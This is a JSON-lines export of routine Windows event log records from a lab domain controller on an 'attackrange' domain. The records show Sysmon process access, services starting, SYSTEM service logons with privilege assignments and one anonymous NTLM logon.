{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.131\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.131","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76806,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The Netlogon service entered the running state.","param1":"Netlogon","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220249,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220250,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76807,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The Spooler service entered the running state.","param1":"Spooler","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220251,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220252,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220253,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220254,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76808,"ProcessID":852,"ThreadID":928,"Channel":"System","Message":"The PcaSvc service entered the running state.","param1":"PcaSvc","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220255,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tNo\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x2C559\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tNtLmSsp \r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\tNTLM V1\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-7","TargetUserName":"ANONYMOUS LOGON","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x2c559","LogonType":"3","LogonProcessName":"NtLmSsp ","AuthenticationPackageName":"NTLM","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"NTLM V1","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1843","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220256,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x354\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
